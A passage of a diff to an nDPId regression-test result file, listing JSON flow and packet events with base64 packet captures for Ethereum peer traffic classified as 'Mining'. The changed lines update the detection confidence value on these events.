-00762{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":41,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":23,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1578508364523,"flow_last_seen":1578508364595,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":512,"flow_tot_l4_payload_len":512,"flow_avg_l4_payload_len":128,"midstream":0,"thread_ts_msec":1578508364595,"l3_proto":"ip4","src_ip":"192.168.1.184","dst_ip":"34.255.23.113","src_port":56627,"dst_port":30303,"l4_proto":"tcp","ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"4":"DPI"},"proto":"Mining","breed":"Unsafe","category":"Mining"}} +00762{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":41,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":23,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1578508364523,"flow_last_seen":1578508364595,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":512,"flow_tot_l4_payload_len":512,"flow_avg_l4_payload_len":128,"midstream":0,"thread_ts_msec":1578508364595,"l3_proto":"ip4","src_ip":"192.168.1.184","dst_ip":"34.255.23.113","src_port":56627,"dst_port":30303,"l4_proto":"tcp","ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"6":"DPI"},"proto":"Mining","breed":"Unsafe","category":"Mining"}} 
01870{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":70,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":5,"flow_packet_id":3,"flow_last_seen":1578508364631,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":1099,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":1099,"pkt_l4_len":1065,"thread_ts_msec":1578508364631,"pkt":"KDc3AG3IEBMx8Tl2CABFAAQ9McxAACoRfjA056VswKgBuHZfdl8EKSMV0Tk6zLZQqYdPasDvQYAfjhJ8qeDK0iQF1oC6v4BIFO8Ukv4XviQf8O74kSNp590utu+\/aRkEwwpxoabIrzvIzmTnyJlNpeyfgvNPwLIyg8I+w4LWPa4MA\/W2\/Jap8zB7AAT5A7z5A7T4TYQS26efgnZfgnZfuEAwkgYgUPIi4WiJg+QLzg9wGMhxPAR7azw\/xSKBAPOQbQlR3L69+mdeoxh\/qQi76RfNXeauKXl5ICJHofVK35cH+E2EUt2AH4J2YIJ2YLhAIbpA\/cDFhpXtS\/hixQb3nA9r93xmFVARyWt8mvD62Q42RXQv9d4buwnSPqvoZ8VPM1tV452Mu7b1nW6WCZP3H\/hNhJBbeIeCdl+Cdl+4QHDcQogYDcUZvsmo9wM3ftVwQss5t6Xz7SYpcIe0QCLsJRPOe\/7IMshT7rIUH59Wvzm2VWBMciyHxs11tRtvlg74TYSyPgragnZfgnZfuECktuxNZlsAPCNrxc8drmg5UZJYYlgJcgwixi3dHcHaL+SmxYYPit8ZDD0AQGDBI97zkdb5Vg5h5AMJ3ltOege3+E2Esj4dt4J2X4J2X7hAbSf3keqm\/kX1w8mhO8tfUrHPkpEON98Bfi90NSvh60PrPxJjJwxphJtd9yYNAp6bvKKmXex+Pf1jNZwIZzl1LfhNhA3mbCqCdl+Cdl+4QOL5cPG1naCZem66zt1KAC6uDCfFoxJhecyNkCxirh\/KFEuDlQVcZ87QmYypugLnAbyvaDrG2A\/fgNNcBVjcu7P4TYS524U+gnZfgnZfuEAvzWrhvDjoXJOa\/ZdCbLgHiFuGktYvbPu1Kx0QfSszMjCe5P4b3hECkMlBLQo90CRjw1UcL0V+qQHcUkhH7ixE+E2ErGlePoJ2X4J2X7hAXGqY3uhYXKqMbPC9rcGcCUaWh+Dhi0uXFAXOGFtMr99hmG7UDnrqzTA\/o5MeRw5C1b8eG9l8GAevaeYZyFb6JfhNhLaioT2Cdl+Cdl+4QIU96ApVNnmCgofL7UIVwC0ussPQFE9BZpIkW9NYXxtm+4r+lcBEpjNfLr4w84vJM4LIgefP7wW0fAmtWWHpBj34TYRZo5RJgnklgnkluED1tj7tRebZlvZCTgHMIT8H0RpJXJ6gH+sJFUxXqZs38C\/hpzENTsCSDh1o2HUHvKg2FabU7+4S+HyXXU68T+Xi+E2EM01tNoLk1oLk1rhAfag2FjkUzZm46\/aJuVMW3oNNsPORtJDs86feqI9xjoUJ09giSja9nrnxBmA4a19j\/wmY0SxfQ5ijGeyrdMEjJvhNhCPk+oyCdl+Cdl+4QD9WPrST\/PNOA12+8bgX6kV4hJFBTbV9EgAQ6hcCTUo0f0CQNtNTkrUkC7hmmUaZ\/d9jh6CLjUr6pActojR+FlyEXhYgYA=="} 
00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":83,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":25,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1578508364632,"flow_last_seen":1578508364632,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1578508364632,"l3_proto":"ip4","src_ip":"192.168.1.184","dst_ip":"51.38.60.79","src_port":56629,"dst_port":30303,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":83,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":25,"flow_packet_id":1,"flow_last_seen":1578508364632,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1578508364632,"pkt":"EBMx8Tl2KDc3AG3ICABFAABAAABAAEAGCOPAqAG4MyY8T901dl\/qiNMXAAAAALAC\/\/88YQAAAgQFtAEDAwUBAQgKItiUuAAAAAAEAgAA"} 00480{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":102,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":12,"flow_packet_id":2,"flow_last_seen":1578508364646,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1578508364646,"pkt":"KDc3AG3IEBMx8Tl2CABFAAA8AABAADIGQxWi86BTwKgBuHZf3SW77REO6nqus6AScSAW9gAAAgQFrAQCCAp1Z9P7ItiUTwEDAwc="} 
00469{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":103,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":12,"flow_packet_id":3,"flow_last_seen":1578508364646,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1578508364646,"pkt":"EBMx8Tl2KDc3AG3ICABFAAA0AABAAEAGNR3AqAG4ovOgU90ldl\/qeq6zu+0RD4AQECymNwAAAQEICiLYlMZ1Z9P7"} -00764{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":104,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":12,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1578508364522,"flow_last_seen":1578508364647,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":458,"flow_tot_l4_payload_len":458,"flow_avg_l4_payload_len":114,"midstream":0,"thread_ts_msec":1578508364647,"l3_proto":"ip4","src_ip":"192.168.1.184","dst_ip":"162.243.160.83","src_port":56613,"dst_port":30303,"l4_proto":"tcp","ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"4":"DPI"},"proto":"Mining","breed":"Unsafe","category":"Mining"}} +00764{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":104,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":12,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1578508364522,"flow_last_seen":1578508364647,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":458,"flow_tot_l4_payload_len":458,"flow_avg_l4_payload_len":114,"midstream":0,"thread_ts_msec":1578508364647,"l3_proto":"ip4","src_ip":"192.168.1.184","dst_ip":"162.243.160.83","src_port":56613,"dst_port":30303,"l4_proto":"tcp","ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": 
{"6":"DPI"},"proto":"Mining","breed":"Unsafe","category":"Mining"}} 01875{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":105,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":6,"flow_packet_id":2,"flow_last_seen":1578508364649,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":1099,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":1099,"pkt_l4_len":1065,"thread_ts_msec":1578508364649,"pkt":"KDc3AG3IEBMx8Tl2CABFAAQ9Do1AACcR\/\/USimxDwKgBuHZfdl8EKXURHZU493PpfyH72WrYTKC\/rHcqyoxdJnlAGqx0IUPpfCDPrp1RbMe2PXXL\/Y0gUgYBHgBKX+LNKEC1qdxuKnvxvXevxKSr69S3rpBsxtD9oPpZta4nmfTh\/aybl9dDX7mZAQT5A7z5A7T4TYTKcBxqgnZfgnZfuECGOOF\/DUGQRmRtLD+gVTFTpr29WNtAkV6+wzvS1j2\/a652c2Up+3+CFGHvVHTbjE15jtDjeTNqp85aDPL\/y+3R+E2E1YVu74J6R4J6R7hACdquySb8h9bDyyzBVqIC4RVjIfrd43xNEhVl26cR8q+zCkRbVR7YOVOrP+cqMugQfvn+wj\/y\/7lEeLvwq\/902PhNhIpLq76Cdl+Cdl+4QPw+TE9tCaxzvKUZLrSUydGaIDt2Km6jvC1h7Hg9CIqQESMae7r6mkOxEncigdCNSYhdj\/fphc\/puhfvJzVEsBH4TYSd5phXgnZfgnZfuEBkLPllDdiGnUJSXb9oWAEuO01k9HXnM4R6tvd0I0GkOXQUhl2VOHTo9e2RsOThxTPe4UrR1rsnalRZskcUYP8N+E2EuRnM0YJv8YJv8bhAWtd39T3gGPqV5\/kAxth9r0Z21IwC3OO8ijNQxmi2ggVwJqg2W08zX0qhgUwFTxRZ7CbZwhQtBb9MNGyCEZnVqfhNhDOhFwyCdl+Cdl+4QK0vqa8HM5bIAwN2G4EpFPUp1DIN0fK8JdET2pxyCxTou65T7kwDQcRwG9J87PVp8UWu5zbalyVDTlzNuCAazd\/4TYQ0CYBEgnZfgnZfuEDgMt94d8TQv+3IGK5MVBJ+471CdMGgEuFgADFs\/sfR77hApAbinmLOWlg0KBI76fx3iPiGmIjPc2DjV6Y5S+dt+E2EI+XoE4J2X4J2X7hAIvfQZKlYQVCc0QQPwdirlpv8ThVD2qtJQ\/hHeZ\/oRum3Dym8iOrz0uJZ5KMKMAHJAax\/7cDcr+ygJhYzzSAsNPhNhBLbp5+Cdl+Cdl+4QDCSBiBQ8iLhaImD5AvOD3AYyHE8BHtrPD\/FIoEA85BtCVHcvr36Z16jGH+pCLvpF81d5q4peXkgIkeh9Urflwf4TYR82eu0gnZfgnZfuEBXvLisck0JGnGrgRqWL\/bDyJ8qsCwpUwM0sk3OmDN\/PU2NXINnOwgDzonj2zUWAZS5\/UZawhYcs8O8n12+UDva+E2EXN5bw4Jv8YJv8bhAmWLd+VP5u1ibBrgKagKp3py+njifftSzD32rmGG+J3QgFhiB28tAr4XUS33ESEXzhatHLB80xoRt5yzzOLxbKvhNhCPEd72CeRmCeRm4QEsv12Yq4nMYX4LQY5r9d7BNkGpNa1KOs2Gd6C4u3NZleL+d2v4Anfsu4uoql9o1Ksl2BdYCVg1KygwMa9DuSGuEXhYgYA=="} 
01013{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":106,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":6,"flow_packet_id":3,"flow_last_seen":1578508364650,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":467,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":467,"pkt_l4_len":433,"thread_ts_msec":1578508364650,"pkt":"KDc3AG3IEBMx8Tl2CABFAAHFDo5AACcRAm0SimxDwKgBuHZfdl8BsYIGz0wiJjKaUzFXr6IJm0KhJJHh14UxEkvPcQ\/Rk7Fgvbo\/feZhAIkP1PMVdfnmkT0ej4RbRZLeGs4r7KmIG\/NoSRob2DIRR9KSxxR5ApQK0GtL+DiOoUZ+LI2SWe0lCUL6AQT5AUT5ATz4TYSnR61sglIIglIIuEB7ukp3Oj6MzbNl3nDN0jQiNpC1V5v5rn9Rt7ZEw1VBzFla5k6rBHcylJhBRGAYzBX+17ncBsVtgVPJrKMh7nvV+E2EEop59oKMoIKMoLhASS3OSNDf3z8b3OyL7l\/Hx\/k821PEzINQHbZfniqNPVksrwSkp6jrG6UYCpQoXvgKZOetorWlposBzYkgatgcWfhNhDP\/TVmCdl2Cdl24QM3iC4E\/jtROh\/yrXbgvFZypcqA1E0NM1pmVBNhPzAEVOKwUDY19JR7HzoFwywH46oqp8Nqzrz5YKF3TzRCEzqb4TYS57vnMglLcglLcuECRN7VxzSUAEA2k0pdpV6OAanNBmMgqxX6AGOkM+qhp9apzS9PVbGdlMMSUUvnshxBsN5liOIkWGjzwRsyI7kXrhF4WIGA="} 00588{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":109,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":26,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1578508364654,"flow_last_seen":1578508364654,"flow_idle_time":200000,"flow_min_l4_payload_len":171,"flow_max_l4_payload_len":171,"flow_tot_l4_payload_len":171,"flow_avg_l4_payload_len":171,"midstream":0,"thread_ts_msec":1578508364654,"l3_proto":"ip4","src_ip":"192.168.1.184","dst_ip":"128.0.51.140","src_port":30303,"dst_port":30303,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 
00669{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":109,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":26,"flow_packet_id":1,"flow_last_seen":1578508364654,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":213,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":213,"pkt_l4_len":179,"thread_ts_msec":1578508364654,"pkt":"EBMx8Tl2KDc3AG3ICABFAADHl8oAAEARbG\/AqAG4gAAzjHZfdl8AswwF15lp9gBLtC6IaCW33is1Th50j8UHjOmT4mAffcZn+yYEl4jGBnLnkKaeXePCjndUh79\/WTQA2R4kNex3KmtFmldicE1yJNj24ZecPC4hxpTcI9qIeMXPlU0BU5Rec0LcAQP4R7hAggEUSZWpWZm0YK3HCqZiBR7sHJ3wp8USPzyX73HGoWVqts4UjRd8TfDxZuCIPe7jI\/CXMWJB7l7pTCCyfJvg8YReFiBg"} -00763{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":109,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":26,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1578508364654,"flow_last_seen":1578508364654,"flow_idle_time":200000,"flow_min_l4_payload_len":171,"flow_max_l4_payload_len":171,"flow_tot_l4_payload_len":171,"flow_avg_l4_payload_len":171,"midstream":0,"thread_ts_msec":1578508364654,"l3_proto":"ip4","src_ip":"192.168.1.184","dst_ip":"128.0.51.140","src_port":30303,"dst_port":30303,"l4_proto":"udp","ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"4":"DPI"},"proto":"Mining","breed":"Unsafe","category":"Mining"}} 
+00763{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":109,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":26,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1578508364654,"flow_last_seen":1578508364654,"flow_idle_time":200000,"flow_min_l4_payload_len":171,"flow_max_l4_payload_len":171,"flow_tot_l4_payload_len":171,"flow_avg_l4_payload_len":171,"midstream":0,"thread_ts_msec":1578508364654,"l3_proto":"ip4","src_ip":"192.168.1.184","dst_ip":"128.0.51.140","src_port":30303,"dst_port":30303,"l4_proto":"udp","ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"6":"DPI"},"proto":"Mining","breed":"Unsafe","category":"Mining"}} 00480{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":124,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":24,"flow_packet_id":2,"flow_last_seen":1578508364657,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1578508364657,"pkt":"KDc3AG3IEBMx8Tl2CABFAAA8AABAAC8GWDwD0S1PwKgBuHZf3TTdrvLSmxdVZqAScSC43wAAAgQFrAQCCApOlRAnItiUTwEDAwc="} 00468{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":126,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":24,"flow_packet_id":3,"flow_last_seen":1578508364657,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1578508364657,"pkt":"EBMx8Tl2KDc3AG3ICABFAAA0AABAAEAGR0TAqAG4A9EtT900dl+bF1Vm3a7y04AQECxIFwAAAQEICiLYlNBOlRAn"} 
00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":140,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":27,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1578508364659,"flow_last_seen":1578508364659,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1578508364659,"l3_proto":"ip4","src_ip":"192.168.1.184","dst_ip":"40.67.144.128","src_port":56630,"dst_port":30303,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":140,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":27,"flow_packet_id":1,"flow_last_seen":1578508364659,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1578508364659,"pkt":"EBMx8Tl2KDc3AG3ICABFAABAAABAAEAGv5TAqAG4KEOQgN02dl98bCWSAAAAALAC\/\/8OmwAAAgQFtAEDAwUBAQgKItiU0QAAAAAEAgAA"} -00760{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":141,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":24,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1578508364523,"flow_last_seen":1578508364659,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":395,"flow_tot_l4_payload_len":395,"flow_avg_l4_payload_len":98,"midstream":0,"thread_ts_msec":1578508364659,"l3_proto":"ip4","src_ip":"192.168.1.184","dst_ip":"3.209.45.79","src_port":56628,"dst_port":30303,"l4_proto":"tcp","ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"4":"DPI"},"proto":"Mining","breed":"Unsafe","category":"Mining"}} 
+00760{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":141,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":24,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1578508364523,"flow_last_seen":1578508364659,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":395,"flow_tot_l4_payload_len":395,"flow_avg_l4_payload_len":98,"midstream":0,"thread_ts_msec":1578508364659,"l3_proto":"ip4","src_ip":"192.168.1.184","dst_ip":"3.209.45.79","src_port":56628,"dst_port":30303,"l4_proto":"tcp","ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"6":"DPI"},"proto":"Mining","breed":"Unsafe","category":"Mining"}} 00480{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":181,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":9,"flow_packet_id":2,"flow_last_seen":1578508364667,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1578508364667,"pkt":"KDc3AG3IEBMx8Tl2CABFAAA8AABAADEG8jtCKlL2wKgBuHZf3SQj+YV4f2iiaKAScSArVwAAAgQFrAQCCAodkmB\/ItiUTwEDAwc="} 00470{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":182,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":9,"flow_packet_id":3,"flow_last_seen":1578508364667,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1578508364667,"pkt":"EBMx8Tl2KDc3AG3ICABFAAA0AABAAEAG40PAqAG4QipS9t0kdl9\/aKJoI\/mFeYAQECy6hgAAAQEICiLYlNgdkmB\/"} 
00480{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":183,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":25,"flow_packet_id":2,"flow_last_seen":1578508364668,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1578508364668,"pkt":"KDc3AG3IEBMx8Tl2CABFAAA8AABAADEGF+czJjxPwKgBuHZf3TW8w0qY6ojTGKAScSDV+QAAAgQFrAQCCAphOp2qItiUuAEDAwc="} 00470{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":184,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":25,"flow_packet_id":3,"flow_last_seen":1578508364668,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1578508364668,"pkt":"EBMx8Tl2KDc3AG3ICABFAAA0AABAAEAGCO\/AqAG4MyY8T901dl\/qiNMYvMNKmYAQECxlkQAAAQEICiLYlNlhOp2q"} -00761{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":185,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":9,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1578508364522,"flow_last_seen":1578508364669,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":429,"flow_tot_l4_payload_len":429,"flow_avg_l4_payload_len":107,"midstream":0,"thread_ts_msec":1578508364669,"l3_proto":"ip4","src_ip":"192.168.1.184","dst_ip":"66.42.82.246","src_port":56612,"dst_port":30303,"l4_proto":"tcp","ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"4":"DPI"},"proto":"Mining","breed":"Unsafe","category":"Mining"}} 
-00761{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":186,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":25,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1578508364632,"flow_last_seen":1578508364670,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":421,"flow_tot_l4_payload_len":421,"flow_avg_l4_payload_len":105,"midstream":0,"thread_ts_msec":1578508364670,"l3_proto":"ip4","src_ip":"192.168.1.184","dst_ip":"51.38.60.79","src_port":56629,"dst_port":30303,"l4_proto":"tcp","ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"4":"DPI"},"proto":"Mining","breed":"Unsafe","category":"Mining"}} +00761{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":185,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":9,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1578508364522,"flow_last_seen":1578508364669,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":429,"flow_tot_l4_payload_len":429,"flow_avg_l4_payload_len":107,"midstream":0,"thread_ts_msec":1578508364669,"l3_proto":"ip4","src_ip":"192.168.1.184","dst_ip":"66.42.82.246","src_port":56612,"dst_port":30303,"l4_proto":"tcp","ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"6":"DPI"},"proto":"Mining","breed":"Unsafe","category":"Mining"}} 
+00761{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":186,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":25,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1578508364632,"flow_last_seen":1578508364670,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":421,"flow_tot_l4_payload_len":421,"flow_avg_l4_payload_len":105,"midstream":0,"thread_ts_msec":1578508364670,"l3_proto":"ip4","src_ip":"192.168.1.184","dst_ip":"51.38.60.79","src_port":56629,"dst_port":30303,"l4_proto":"tcp","ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"6":"DPI"},"proto":"Mining","breed":"Unsafe","category":"Mining"}} 00581{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":198,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":28,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1578508364682,"flow_last_seen":1578508364682,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1578508364682,"l3_proto":"ip4","src_ip":"192.168.1.184","dst_ip":"51.38.81.180","src_port":56632,"dst_port":30303,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":198,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":28,"flow_packet_id":1,"flow_last_seen":1578508364682,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1578508364682,"pkt":"EBMx8Tl2KDc3AG3ICABFAABAAABAAEAG833AqAG4MyZRtN04dl9aLQCVAAAAALAC\/\/+JqQAAAgQFtAEDAwUBAQgKItiU5gAAAAAEAgAA"} 
01980{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":212,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":7,"flow_packet_id":2,"flow_last_seen":1578508364694,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":1178,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":1178,"pkt_l4_len":1144,"thread_ts_msec":1578508364694,"pkt":"KDc3AG3IEBMx8Tl2CABFAASM2BBAADcR1ngiYawWwKgBuHZfdl8EeMBgH0wTNhnEtwanpj7oWlZ\/Hp0Gak0vyLNY48lrCKzEN97iWOlAwiKU8J2As0GDwpvqMobAk\/doYUwERgBj\/dX1qwI+w93bqV+opA8zeXK5DOY5QqaAWe1EmRlafyw14V0SAAT5BAv5BAP4TYRPFs69gun3gun3uECCARRJlalZmbRgrccKpmIFHuwcnfCnxRI\/PJfvccahZWq2zhSNF3xN8PFm4Ig97uMj8JcxYkHuXulMILJ8m+Dx+E2ENiSg04J2X4J2X7hAPRqHFTz0e8oEsmOadgUbUG0\/Gq1XFXFWshB59yMDlMnzDbSaQte3vRlNp0x8bXK\/C0IExkQW+7e6O42uaIsSOfhNhG\/lALSCTtaCTta4QNKaGvf27ePtI09PYWMWWoqsTgBFWVV\/OStWx2mo9mqS58z7TiK83yibq71BZSi0CSsekwb4Zyr8nj5zQd0mqCb4TYSkhGWfgnZfgnZfuEBoaZQlH\/tAMTmENPyYivdiK6qXFlTxe+\/p6cPLqiael7D6BFBiRXZHacw3oUOaGk4+u32W1NMUjoJXk06B2mEI+E2ELzgXtoJ2X4J2X7hAZ5DyvV4L2UjTbfMTNRlwVlkkGIIkt\/VYvYJ76IXUVE6r5fvcx+2tWoDAFaFaLZO1vJw5B3fbXfeObFaJ1qahJvhNhHLbOhmCTtaCTta4QOsAfRHCWayd+ePpaQzEOGf3dXjZZgxjuurzp9q\/DaDAlI